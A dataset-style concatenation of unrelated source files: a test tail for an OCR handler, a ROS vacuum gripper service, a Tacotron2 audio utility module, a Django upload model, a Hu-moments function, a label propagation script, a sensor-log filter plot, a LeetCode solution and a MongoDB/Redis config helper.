self.check_ret(ret, 500, None, '3.6')
ret = handler_check_result.main_handler({'queryString': {'img_id': img_id}}, None)
self.check_ret(ret, 500, None, '3.7')
self.check_get_object(client, img_id, 0, '3.6 - 3.7')
ret = handler_check_result.main_handler({'queryString': {'img_id': img_id}}, None)
self.check_ret(ret, 500, None, '3.8')
ret = handler_check_result.main_handler({'queryString': {'img_id': img_id}}, None)
self.check_ret(ret, 500, None, '3.9')
check_cos_config(self, mock_cos_config, 6, '3.x')
check_cos_client(self, mock_cos_client, 6, '3.x')
self.check_sleep(mock_time, 0, '3.x')
@mock.patch('handler_check_result.CosConfig')
@mock.patch('handler_check_result.CosS3Client')
@mock.patch('handler_check_result.time')
def test_bad_ocr_result(
self,
mock_time: mock.MagicMock,
mock_cos_client: mock.MagicMock,
mock_cos_config: mock.MagicMock
):
"""测试 OCR 返回非法数据
测试用例: 3.10
"""
mock_cos_config.return_value = 'config'
mock_time.time.side_effect = range(30)
ocr_result = mock.MagicMock()
ocr_result['Body'].get_raw_stream.return_value = BytesIO(b'test')
client = mock_cos_client.return_value
client.get_object.return_value = ocr_result
img_id = '12345678-1234-1234-1234-1234567890ab'
ret = handler_check_result.main_handler({'queryString': {'img_id': img_id}}, None)
self.check_ret(ret, 500, None, '3.10')
check_cos_config(self, mock_cos_config, 2, '3.10')
check_cos_client(self, mock_cos_client, 2, '3.10')
self.check_head_object(client, img_id, '3.10')
self.check_get_object(client, img_id, 1, '3.10')
        self.check_sleep(mock_time, 0, '3.10')
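# Hedged addition (not in the original file): the suite is plain unittest, so
# assuming the file keeps its tests.py name it can be run directly with
# `python tests.py` or via `python -m unittest tests -v`.
if __name__ == '__main__':
    unittest.main()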
| 39.754357 | 120 | 0.580995 |
8f8a05f5a652b9df487255b02ea590c7b3aba108
| 5,873 |
py
|
Python
|
vb_simulation_pkgs/pkg_vb_sim/scripts/node_service_server_vacuum_gripper_ur5_1.py
|
ROBODITYA/Eyantra-2021-Vargi-Bots
|
f1c6a82c46e6e84486a4832b3fbcd02625849447
|
[
"MIT"
] | 1 |
2021-07-13T07:05:29.000Z
|
2021-07-13T07:05:29.000Z
|
vb_simulation_pkgs/pkg_vb_sim/scripts/node_service_server_vacuum_gripper_ur5_1.py
|
TejasPhutane/Eyantra-2021-Vargi-Bots
|
ab84a1304101850be8c0f69cfe6de70d53c33189
|
[
"MIT"
] | 1 |
2021-06-05T07:58:03.000Z
|
2021-06-05T07:58:03.000Z
|
vb_simulation_pkgs/pkg_vb_sim/scripts/node_service_server_vacuum_gripper_ur5_1.py
|
ROBODITYA/Eyantra-2021-Vargi-Bots
|
f1c6a82c46e6e84486a4832b3fbcd02625849447
|
[
"MIT"
] | null | null | null |
#! /usr/bin/env python
import rospy
from gazebo_ros_link_attacher.srv import Attach, AttachRequest, AttachResponse
from pkg_vb_sim.srv import vacuumGripper
from pkg_vb_sim.srv import vacuumGripperRequest
from pkg_vb_sim.srv import vacuumGripperResponse
from pkg_vb_sim.msg import LogicalCameraImage
class VacuumGripper():
# Constructor
def __init__(self):
param_config_vacuum_gripper = rospy.get_param('config_vacuum_gripper_ur5_1')
self._vacuum_gripper_model_name = param_config_vacuum_gripper['vacuum_gripper_model_name']
self._vacuum_gripper_link_name = param_config_vacuum_gripper['vacuum_gripper_link_name']
self._object_model_name = ""
self._object_link_name = param_config_vacuum_gripper['attachable_object_link_name']
self._attachable_object_prefix = param_config_vacuum_gripper['attachable_object_prefix']
self._attachable_object_delimiter = param_config_vacuum_gripper['attachable_object_delimiter']
self._logical_camera_topic_name = param_config_vacuum_gripper['logical_camera_topic_name']
print(param_config_vacuum_gripper)
self._flag_pickable = False
self._flag_plugin_in_use = False
self._count = 0
rospy.loginfo("Creating ServiceProxy to /link_attacher_node/attach")
self._attach_srv_a = rospy.ServiceProxy('/link_attacher_node/attach',Attach)
self._attach_srv_a.wait_for_service()
rospy.loginfo("Created ServiceProxy to /link_attacher_node/attach")
rospy.loginfo("Creating ServiceProxy to /link_attacher_node/detach")
self._attach_srv_d = rospy.ServiceProxy('/link_attacher_node/detach',Attach)
self._attach_srv_d.wait_for_service()
rospy.loginfo("Created ServiceProxy to /link_attacher_node/detach")
rospy.loginfo( '\033[94m' + " >>> Vacuum Gripper init done." + '\033[0m')
def activate_vacuum_gripper(self):
rospy.set_param("vacuum_gripper_plugin_in_usage", True)
rospy.loginfo("Attach request received")
req = AttachRequest()
req.model_name_1 = self._vacuum_gripper_model_name
req.link_name_1 = self._vacuum_gripper_link_name
req.model_name_2 = self._object_model_name
req.link_name_2 = self._object_link_name
self._attach_srv_a.call(req)
rospy.set_param("vacuum_gripper_plugin_in_usage", False)
def deactivate_vacuum_gripper(self):
rospy.set_param("vacuum_gripper_plugin_in_usage", True)
rospy.loginfo("Detach request received")
req = AttachRequest()
req.model_name_1 = self._vacuum_gripper_model_name
req.link_name_1 = self._vacuum_gripper_link_name
req.model_name_2 = self._object_model_name
req.link_name_2 = self._object_link_name
self._attach_srv_d.call(req)
rospy.set_param("vacuum_gripper_plugin_in_usage", False)
def callback_service_on_request(self, req):
self._flag_plugin_in_use = rospy.get_param("vacuum_gripper_plugin_in_usage")
rospy.loginfo( '\033[94m' + " >>> Vacuum Gripper Activate: {}".format(req.activate_vacuum_gripper) + '\033[0m')
rospy.loginfo( '\033[94m' + " >>> Vacuum Gripper Flag Pickable: {}".format(self._flag_pickable) + '\033[0m')
rospy.loginfo( '\033[94m' + " >>> Vacuum Gripper Plugin in Use: {}".format(self._flag_plugin_in_use) + '\033[0m')
if( (req.activate_vacuum_gripper is True) and (self._flag_pickable is True) and (self._flag_plugin_in_use is False) ):
self.activate_vacuum_gripper()
return vacuumGripperResponse(True)
else:
# self._flag_pickable = False
self.deactivate_vacuum_gripper()
return vacuumGripperResponse(False)
def callback_topic_subscription(self, rx_msg):
# rospy.logwarn( '\033[94m' + "{}".format(rx_msg) + '\033[0m')
self._count += 1
number_models = len(rx_msg.models)
        if ( (self._count > 1) and (number_models == 0) ):
            # the logical camera no longer reports any model:
            # clear the pick state before returning
            flag_attachable_object_found = False
            self._flag_pickable = False
            self._count = 0
            return
else:
for i in range(0, number_models):
name_model = rx_msg.models[i].type
lst_name_model = name_model.split(self._attachable_object_delimiter)
if(lst_name_model[0] == self._attachable_object_prefix):
rospy.loginfo( '\033[94m' + ">>> [ur5_1] Vacuum Gripper: Pickable object found {}. Pickable: {}".format(name_model, self._flag_pickable) + '\033[0m')
self._object_model_name = name_model
flag_attachable_object_found = True
self._flag_pickable = True
break
# if(flag_attachable_object_found is False):
# rospy.logwarn("making flag pickable False")
# self._flag_pickable = False
# Destructor
def __del__(self):
rospy.loginfo( '\033[94m' + " >>> Vacuum Gripper Del." + '\033[0m')
def main():
rospy.init_node('node_service_server_vacuum_gripper_ur5_1')
ur5_vacuum_gripper = VacuumGripper()
s = rospy.Service('/eyrc/vb/ur5/activate_vacuum_gripper/ur5_1', vacuumGripper, ur5_vacuum_gripper.callback_service_on_request)
rospy.loginfo( '\033[94m' + " >>> Vacuum Gripper Activation Service Ready." + '\033[0m')
rospy.Subscriber(ur5_vacuum_gripper._logical_camera_topic_name, LogicalCameraImage, ur5_vacuum_gripper.callback_topic_subscription)
rospy.spin()
if __name__ == "__main__":
main()
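# --- Hedged client-side sketch (commented out; assumes the same pkg_vb_sim
# service definition and a running ROS master, neither of which is shown here).
# The single request field is passed positionally, matching the
# req.activate_vacuum_gripper field used by the server above. ---
# import rospy
# from pkg_vb_sim.srv import vacuumGripper
# rospy.wait_for_service('/eyrc/vb/ur5/activate_vacuum_gripper/ur5_1')
# gripper = rospy.ServiceProxy('/eyrc/vb/ur5/activate_vacuum_gripper/ur5_1', vacuumGripper)
# print(gripper(True))   # activate the gripper; gripper(False) releases the object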
| 36.478261 | 169 | 0.664907 |
2d087b8caa7fb2725c6b94af865cdc71a28aada9
| 374 |
py
|
Python
|
Python/Courses/Python-Tutorials.Telusko/01.Object-Oriented-Programming/16.01-Duck-Typing.py
|
shihab4t/Books-Code
|
b637b6b2ad42e11faf87d29047311160fe3b2490
|
[
"Unlicense"
] | null | null | null |
Python/Courses/Python-Tutorials.Telusko/01.Object-Oriented-Programming/16.01-Duck-Typing.py
|
shihab4t/Books-Code
|
b637b6b2ad42e11faf87d29047311160fe3b2490
|
[
"Unlicense"
] | null | null | null |
Python/Courses/Python-Tutorials.Telusko/01.Object-Oriented-Programming/16.01-Duck-Typing.py
|
shihab4t/Books-Code
|
b637b6b2ad42e11faf87d29047311160fe3b2490
|
[
"Unlicense"
] | null | null | null |
class PyCharm:
def execute(self):
print("Compiling")
print("Running")
class MyCharm:
def execute(self):
print("Spell Check")
print("Convention Check")
print("Compiling")
print("Running")
class Laptop:
def code(self, ide):
ide.execute()
ide = PyCharm()
ide2 = MyCharm()
lap = Laptop()
lap.code(ide2)
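# Hedged extension (illustration only; the VsCode class below is made up and is
# not part of the original lesson). Laptop.code() never checks the IDE's type,
# it only calls .execute(), so any object that provides execute() works:
class VsCode:
    def execute(self):
        print("Linting")
        print("Compiling")
        print("Running")
lap.code(VsCode())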
| 14.96 | 33 | 0.574866 |
d976f71c3429044648411f53a4225fe77bd37af7
| 4,804 |
py
|
Python
|
research/audio/tacotron2/src/utils/audio.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 77 |
2021-10-15T08:32:37.000Z
|
2022-03-30T13:09:11.000Z
|
research/audio/tacotron2/src/utils/audio.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 3 |
2021-10-30T14:44:57.000Z
|
2022-02-14T06:57:57.000Z
|
research/audio/tacotron2/src/utils/audio.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 24 |
2021-10-15T08:32:45.000Z
|
2022-03-24T18:45:20.000Z
|
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
'''audio'''
import librosa
import librosa.filters
import numpy as np
import scipy.signal
from scipy.io import wavfile
from src.hparams import hparams as hps
def load_wav(path):
''' load wav '''
_, wav = wavfile.read(path)
signed_int16_max = 2**15
if wav.dtype == np.int16:
wav = wav.astype(np.float32) / signed_int16_max
wav = wav / np.max(np.abs(wav))
return wav
def save_wav(wav, path):
''' save wav'''
wav *= 32767 / max(0.01, np.max(np.abs(wav)))
wavfile.write(path, hps.sample_rate, wav.astype(np.int16))
def preemphasis(x):
''' preemphasis '''
return scipy.signal.lfilter([1, -hps.preemphasis], [1], x)
def inv_preemphasis(x):
''' inv preemphasis '''
return scipy.signal.lfilter([1], [1, -hps.preemphasis], x)
def spectrogram(y):
''' extract spectrogram '''
D = _stft(preemphasis(y))
S = _amp_to_db(np.abs(D)) - hps.ref_level_db
return _normalize(S)
def inv_spectrogram(spec):
'''Converts spectrogram to waveform using librosa'''
S = _db_to_amp(_denormalize(spec) + hps.ref_level_db)
return inv_preemphasis(_griffin_lim(S ** hps.power))
def melspectrogram(y):
'''extract normalized mel spectrogram'''
D = _stft(y)
S = _amp_to_db(_linear_to_mel(np.abs(D))) - hps.ref_level_db
return _normalize(S)
def inv_melspectrogram(spec):
'''convert mel spectrogram to waveform '''
mel = _db_to_amp(_denormalize(spec) + hps.ref_level_db)
S = _mel_to_linear(mel)
return _griffin_lim(S ** hps.power)
def find_endpoint(wav, threshold_db=-40, min_silence_sec=0.8):
''' find endpoint '''
window_length = int(hps.sample_rate * min_silence_sec)
hop_length = int(window_length / 4)
threshold = _db_to_amp(threshold_db)
for x in range(hop_length, len(wav) - window_length, hop_length):
if np.max(wav[x:x + window_length]) < threshold:
return x + hop_length
return len(wav)
def _griffin_lim(S):
'''librosa implementation of Griffin-Lim
Based on https://github.com/librosa/librosa/issues/434
'''
angles = np.exp(2j * np.pi * np.random.rand(*S.shape))
    S_complex = np.abs(S).astype(np.complex128)
y = _istft(S_complex * angles)
for _ in range(hps.gl_iters):
angles = np.exp(1j * np.angle(_stft(y)))
y = _istft(S_complex * angles)
return y
def _stft(y):
''' stft using librosa '''
n_fft, hop_length, win_length = _stft_parameters()
return librosa.stft(
y=y,
n_fft=n_fft,
hop_length=hop_length,
win_length=win_length,
pad_mode='reflect')
def _istft(y):
''' istft using librosa '''
_, hop_length, win_length = _stft_parameters()
return librosa.istft(y, hop_length=hop_length, win_length=win_length)
def _stft_parameters():
''' get stft parameters'''
n_fft = (hps.num_freq - 1) * 2
hop_length = hps.hop_length
win_length = hps.win_length
return n_fft, hop_length, win_length
_mel_basis = None
def _linear_to_mel(spec):
''' linear spectrogram to mel spectrogram'''
global _mel_basis
if _mel_basis is None:
_mel_basis = _build_mel_basis()
return np.dot(_mel_basis, spec)
def _mel_to_linear(spec):
''' mel spectrogram to linear spectrogram '''
global _mel_basis
if _mel_basis is None:
_mel_basis = _build_mel_basis()
inv_mel_basis = np.linalg.pinv(_mel_basis)
inverse = np.dot(inv_mel_basis, spec)
inverse = np.maximum(1e-10, inverse)
return inverse
def _build_mel_basis():
''' build mel filters '''
n_fft = (hps.num_freq - 1) * 2
    return librosa.filters.mel(
        sr=hps.sample_rate,
        n_fft=n_fft,
        fmin=hps.fmin,
        fmax=hps.fmax,
        n_mels=hps.num_mels)
def _amp_to_db(x):
''' amp to db'''
return 20 * np.log10(np.maximum(1e-5, x))
def _db_to_amp(x):
''' db to amp '''
return np.power(10.0, x * 0.05)
def _normalize(S):
''' normalize '''
return np.clip((S - hps.min_level_db) / -hps.min_level_db, 0, 1)
def _denormalize(S):
'''denormalize '''
return (np.clip(S, 0, 1) * -hps.min_level_db) + hps.min_level_db
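# --- Hedged usage sketch (not part of the original module). It assumes `hps`
# is fully configured (sample_rate, num_freq, num_mels, fmin, fmax, hop_length,
# win_length, preemphasis, ref_level_db, min_level_db, power, gl_iters) and
# that 'example.wav' exists; both the file name and the config are assumptions. ---
if __name__ == '__main__':
    wav = load_wav('example.wav')
    mel = melspectrogram(wav)        # normalized mel spectrogram in [0, 1]
    recon = inv_melspectrogram(mel)  # Griffin-Lim phase reconstruction
    save_wav(recon, 'example_recon.wav')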
| 26.688889 | 78 | 0.652998 |
d68b937d64634350f10e5a80efa8219f50052d65
| 492 |
py
|
Python
|
nz_django/day6/uploadfile_demo/front/models.py
|
gaohj/nzflask_bbs
|
36a94c380b78241ed5d1e07edab9618c3e8d477b
|
[
"Apache-2.0"
] | null | null | null |
nz_django/day6/uploadfile_demo/front/models.py
|
gaohj/nzflask_bbs
|
36a94c380b78241ed5d1e07edab9618c3e8d477b
|
[
"Apache-2.0"
] | 27 |
2020-02-12T07:55:58.000Z
|
2022-03-12T00:19:09.000Z
|
nz_django/day6/uploadfile_demo/front/models.py
|
gaohj/nzflask_bbs
|
36a94c380b78241ed5d1e07edab9618c3e8d477b
|
[
"Apache-2.0"
] | 2 |
2020-02-18T01:54:55.000Z
|
2020-02-21T11:36:28.000Z
|
from django.db import models
from django.core import validators
# Create your models here.
class Article(models.Model):
title = models.CharField(max_length=100)
content = models.TextField()
# thumbnail = models.FileField(upload_to='files',validators=[validators.FileExtensionValidator(['jpg','png','jpeg','gif'],message='文件必须是图片')])
thumbnail = models.FileField(upload_to='%Y/%m/%d',validators=[validators.FileExtensionValidator(['jpg','png','jpeg','gif'],message='文件必须是图片')])
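# Hedged configuration sketch (assumption: a typical project settings module,
# which is not part of this file). upload_to='%Y/%m/%d' stores uploads under
# MEDIA_ROOT/<year>/<month>/<day>/, so the project would normally define e.g.
#   MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
#   MEDIA_URL = '/media/'
# and the upload form must be submitted with enctype="multipart/form-data".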
| 61.5 | 147 | 0.739837 |
ba4bc26e98e57af372fb515bdb45ba79fe152105
| 812 |
py
|
Python
|
doc/for_dev/scikit-image/future/_moments_cy.py
|
fluiddyn/transonic
|
a460e9f6d1139f79b668cb3306d1e8a7e190b72d
|
[
"BSD-3-Clause"
] | 88 |
2019-01-08T16:39:08.000Z
|
2022-02-06T14:19:23.000Z
|
doc/for_dev/scikit-image/future/_moments_cy.py
|
fluiddyn/transonic
|
a460e9f6d1139f79b668cb3306d1e8a7e190b72d
|
[
"BSD-3-Clause"
] | 13 |
2019-06-20T15:53:10.000Z
|
2021-02-09T11:03:29.000Z
|
doc/for_dev/scikit-image/future/_moments_cy.py
|
fluiddyn/transonic
|
a460e9f6d1139f79b668cb3306d1e8a7e190b72d
|
[
"BSD-3-Clause"
] | 1 |
2019-11-05T03:03:14.000Z
|
2019-11-05T03:03:14.000Z
|
import numpy as np
from transonic import boost, Array
@boost(wraparound=False, cdivision=True, nonecheck=False)
def moments_hu(nu: "float64[:,:]"):
hu: Array[np.float64, "1d", "C"] = np.zeros((7,), dtype=np.float64)
t0: np.float64 = nu[3, 0] + nu[1, 2]
t1: np.float64 = nu[2, 1] + nu[0, 3]
q0: np.float64 = t0 * t0
q1: np.float64 = t1 * t1
n4: np.float64 = 4 * nu[1, 1]
s: np.float64 = nu[2, 0] + nu[0, 2]
d: np.float64 = nu[2, 0] - nu[0, 2]
hu[0] = s
hu[1] = d * d + n4 * nu[1, 1]
hu[3] = q0 + q1
hu[5] = d * (q0 - q1) + n4 * t0 * t1
t0 *= q0 - 3 * q1
t1 *= 3 * q0 - q1
q0 = nu[3, 0] - 3 * nu[1, 2]
q1 = 3 * nu[2, 1] - nu[0, 3]
hu[2] = q0 * q0 + q1 * q1
hu[4] = q0 * t0 + q1 * t1
hu[6] = q1 * t0 - q0 * t1
return np.asarray(hu)
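# --- Hedged usage sketch (illustration only). Assumes transonic is installed;
# without an ahead-of-time build, @boost falls back to plain Python. The random
# 4x4 array stands in for real normalized central moments (e.g. from
# skimage.measure.moments_normalized) just to show the call shape. ---
if __name__ == '__main__':
    rng = np.random.default_rng(0)
    nu_demo = rng.random((4, 4))
    print(moments_hu(nu_demo))  # seven Hu moment invariants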
| 29 | 71 | 0.487685 |
301855013a9ca88d3c9c384b1bb74f9680987796
| 3,127 |
py
|
Python
|
main.py
|
J-CIC/Label_Propagation
|
02997bb463e1021d4de354b270d0c7bbd93817ca
|
[
"MIT"
] | 3 |
2018-07-17T12:19:44.000Z
|
2019-04-25T14:00:59.000Z
|
main.py
|
J-CIC/Label_Propagation
|
02997bb463e1021d4de354b270d0c7bbd93817ca
|
[
"MIT"
] | null | null | null |
main.py
|
J-CIC/Label_Propagation
|
02997bb463e1021d4de354b270d0c7bbd93817ca
|
[
"MIT"
] | null | null | null |
import pandas as pd
import numpy as np
import random
from scipy.special import comb
def cal_distance(vec1,vec2):
return np.sum(np.square(vec1 -vec2))
def generate_weight_graph(graph_array,max_id,a):
weight_graph = np.zeros((max_id,max_id))
for i in range(0,max_id):
for j in range(i,max_id):
weight_graph[i][j] = np.e**(-cal_distance(graph_array[i],graph_array[j])/(a*a))
weight_graph[j][i] = weight_graph[i][j]
return weight_graph
edge_link = pd.read_table("email-Eu-core.txt",' ',header=None)
labels_res = pd.read_table("email-Eu-core-department-labels.txt"," ",header=None)
# label_class = 42 # from 0 to 41
max_id = max(edge_link[0].max(),edge_link[1].max()) + 1
label_class = len(labels_res[1].unique())
graph_array = np.zeros((max_id, max_id))
for index,row in edge_link.iterrows():
graph_array[row[0]][row[1]] = 1
graph_array[row[1]][row[0]] = 1
weight_graph = generate_weight_graph(graph_array,max_id,1)
for i in range(0,max_id):
weight_graph[i] = weight_graph[i]/weight_graph[i].sum()
def loop(frac):
sum = 0.0
for i in range(0,10):
sum = sum + main(frac)
print("Average result of frac %f is %f "% (frac,sum/10))
def main(frac):
train=labels_res.sample(frac=frac)
test=labels_res.drop(train.index)
matrix = np.zeros((max_id,label_class))
for index,row in train.iterrows():
matrix[index][row[1]] = 1
for index,row in test.iterrows():
matrix[index][random.randint(0,label_class-1)] = 1
iter_count = 0
while(True):
label_true=list()
label_predict = list()
t_matrix = np.dot(weight_graph,matrix)
count = 0
for index,row in train.iterrows():
t_matrix[index].fill(0)
t_matrix[index][row[1]] = 1
for index,row in test.iterrows():
idx = t_matrix[index].argmax()
idx2 = matrix[index].argmax()
label_true.append(row[1])
label_predict.append(idx)
t_matrix[index].fill(0)
t_matrix[index][idx] = 1
if(idx!=idx2):
count = count + 1
matrix = t_matrix
iter_count = iter_count +1
# print("iter %d:"%iter_count, " diff count:",count)
if(count==0):
break
result = rand_index_score(label_true,label_predict)
# print("Converge after %d iterations" %iter_count," Final Rand index score of frac %f"%frac,result)
return result
# print(label_true)
# print(label_predict)
def rand_index_score(clusters, classes):
tp_plus_fp = comb(np.bincount(clusters), 2).sum()
tp_plus_fn = comb(np.bincount(classes), 2).sum()
A = np.c_[(clusters, classes)]
tp = sum(comb(np.bincount(A[A[:, 0] == i, 1]), 2).sum()
for i in set(clusters))
fp = tp_plus_fp - tp
fn = tp_plus_fn - tp
tn = comb(len(A), 2) - tp - fp - fn
return (tp + tn) / (tp + fp + fn + tn)
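# Hedged worked example (toy labelings chosen for illustration):
# for clusters [0, 0, 1, 1] vs classes [0, 0, 1, 2] there are C(4,2) = 6 pairs;
# 1 pair is grouped together under both labelings (tp), 4 pairs are kept apart
# under both (tn) and 1 pair is grouped only by the clustering (fp), so
# rand_index_score([0, 0, 1, 1], [0, 0, 1, 2]) = (1 + 4) / 6 ≈ 0.833.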
if __name__ == '__main__':
loop(0.30)
loop(0.35)
loop(0.40)
loop(0.45)
loop(0.50)
loop(0.55)
loop(0.60)
loop(0.65)
loop(0.70)
loop(0.75)
loop(0.80)
| 29.224299 | 104 | 0.60985 |
2324767c83fb836178aa06d842e9fd67e06c402d
| 1,515 |
py
|
Python
|
05_Simulatoren/02_FilterSimulator/main.py
|
Pluscrafter/SHARKSKY
|
f3d5e96c9f4cd25e4c03537f1f8d9b9756042dac
|
[
"MIT"
] | 3 |
2019-11-28T23:18:23.000Z
|
2019-12-02T14:01:02.000Z
|
05_Simulatoren/02_FilterSimulator/main.py
|
Pluscrafter/SHARKSKY
|
f3d5e96c9f4cd25e4c03537f1f8d9b9756042dac
|
[
"MIT"
] | null | null | null |
05_Simulatoren/02_FilterSimulator/main.py
|
Pluscrafter/SHARKSKY
|
f3d5e96c9f4cd25e4c03537f1f8d9b9756042dac
|
[
"MIT"
] | 1 |
2019-12-02T14:34:11.000Z
|
2019-12-02T14:34:11.000Z
|
from matplotlib import pyplot as plt
import numpy as np
import math
def digital_low_pass(cutoff_frequency, input):
# https://en.wikipedia.org/wiki/Low-pass_filter#Simple_infinite_impulse_response_filter
fc = 2 * math.pi * cutoff_frequency
alpha = (fc * dt) / (1 + fc * dt)
output = [0] * len(input)
output[0] = input[0]
print(alpha)
for i in range(1, len(input)):
output[i] = alpha * input[i] + (1 - alpha) * output[i - 1]
return output
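# Hedged note (illustrative arithmetic, not from the original log processing):
# the loop above is the first-order IIR smoother
#   y[i] = alpha * x[i] + (1 - alpha) * y[i - 1],
#   alpha = (2*pi*fc*dt) / (1 + 2*pi*fc*dt).
# Assuming a 1 ms sample period, an 80 Hz cutoff gives
# alpha = 0.5027 / 1.5027 ~ 0.33, i.e. each new sample contributes roughly a
# third of the smoothed output.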
with open('LOG2','r') as file:
line = []
for i in file:
line.append(i.rstrip('\n'))
time = []
dtime = []
dt = 0
pitch = []
roll = []
yaw = []
for i in line:
x = i.split('\t')
pitch.append(float(x[0]))
time.append(float(x[3]))
for i in range(1, len(time)):
dtime.append(time[i]-time[i-1])
for i in dtime:
dt += i
dt = dt/len(dtime)
freq = 1.0/dt
fpitch = digital_low_pass(80, pitch)
#froll = digital_low_pass(80, roll)
#fyaw = digital_low_pass(3, yaw)
plt.plot(time, pitch, color='blue', linewidth=1, label='ungefilterter abs. Winkel')
plt.plot(time, fpitch, color='red', linewidth=1, label='gefilterter abs. Winkel mit 80Hz')
plt.xlabel("Zeit in [s]")
plt.ylabel("Absoluter Winkel in [°]")
plt.legend()
plt.show()
print(dt)
#pitch = np.asarray(froll)
#y = np.fft.fft(froll)
y2 = np.fft.fft(yaw)
y3 = np.fft.fft(fyaw)
N = int(len(y2)/2+1)
X = np.linspace(0, freq/2, N, endpoint=True)
#plt.plot(X, np.abs(y[:N]/N))
plt.plot(X, np.abs(y2[:N]/N))
plt.plot(X, np.abs(y3[:N]/N))
plt.show()
| 21.041667 | 91 | 0.625743 |
88d4a2cb2099524d7d8ef471cf73c188d6f7c268
| 640 |
py
|
Python
|
leetcode/376-Wiggle-Subsequence/WiggleSubseq.py
|
cc13ny/all-in
|
bc0b01e44e121ea68724da16f25f7e24386c53de
|
[
"MIT"
] | 1 |
2015-12-16T04:01:03.000Z
|
2015-12-16T04:01:03.000Z
|
leetcode/376-Wiggle-Subsequence/WiggleSubseq.py
|
cc13ny/all-in
|
bc0b01e44e121ea68724da16f25f7e24386c53de
|
[
"MIT"
] | 1 |
2016-02-09T06:00:07.000Z
|
2016-02-09T07:20:13.000Z
|
leetcode/376-Wiggle-Subsequence/WiggleSubseq.py
|
cc13ny/all-in
|
bc0b01e44e121ea68724da16f25f7e24386c53de
|
[
"MIT"
] | 2 |
2019-06-27T09:07:26.000Z
|
2019-07-01T04:40:13.000Z
|
class Solution(object):
def wiggleMaxLength(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
if len(nums) < 2:
return len(nums)
res = 0
for i in xrange(1, len(nums) - 1):
if nums[i] == nums[i + 1]:
nums[i + 1], nums[i] = nums[i], nums[i - 1]
if nums[i - 1] < nums[i] and nums[i] > nums[i + 1]:
res += 1
if nums[i - 1] > nums[i] and nums[i] < nums[i + 1]:
res += 1
if res or nums[0] != nums[-1]:
res += 2
else:
res = 1
return res
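# Hedged usage sketch (Python 2, matching the xrange above; the values are an
# illustrative example, not from the original file):
# [1, 7, 4, 9, 2, 5] already alternates up/down at every step, so the longest
# wiggle subsequence is the whole array:
# print Solution().wiggleMaxLength([1, 7, 4, 9, 2, 5])  # -> 6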
| 27.826087 | 63 | 0.392188 |
4e158cb5dce9aa1a051fd9fadfe515b346835558
| 450 |
py
|
Python
|
spider/Config_defect.py
|
iecasszyjy/tweet_search-master
|
e4978521a39964c22ae46bf35d6ff17710e8e6c6
|
[
"MIT"
] | null | null | null |
spider/Config_defect.py
|
iecasszyjy/tweet_search-master
|
e4978521a39964c22ae46bf35d6ff17710e8e6c6
|
[
"MIT"
] | 2 |
2021-03-31T18:54:16.000Z
|
2021-12-13T19:49:08.000Z
|
spider/Config_defect.py
|
iecasszyjy/tweet_search-master
|
e4978521a39964c22ae46bf35d6ff17710e8e6c6
|
[
"MIT"
] | null | null | null |
# -*- coding:utf-8 -*-
# got文件、MongoDB数据库和Redis数据库配置文件
import os
import sys
import pymongo
import redis
def get_noau_config():
# got文件
if sys.version_info[0] < 3:
import got
else:
import got3 as got
# MongoDB数据库
client = pymongo.MongoClient(os.environ['MONGOHOST'], 27017)
db = client.nk_defect
# Redis数据库
r = redis.StrictRedis(host=os.environ['REDISHOST'], port=6379, db=0)
return got, db, r
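# Hedged usage sketch (commented out; the collection name and keys are made up,
# and MONGOHOST/REDISHOST must be set in the environment):
# got, db, r = get_noau_config()
# db.tweets.insert_one({'text': 'example tweet'})
# r.set('last_crawl', 'example')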
| 18.75 | 72 | 0.651111 |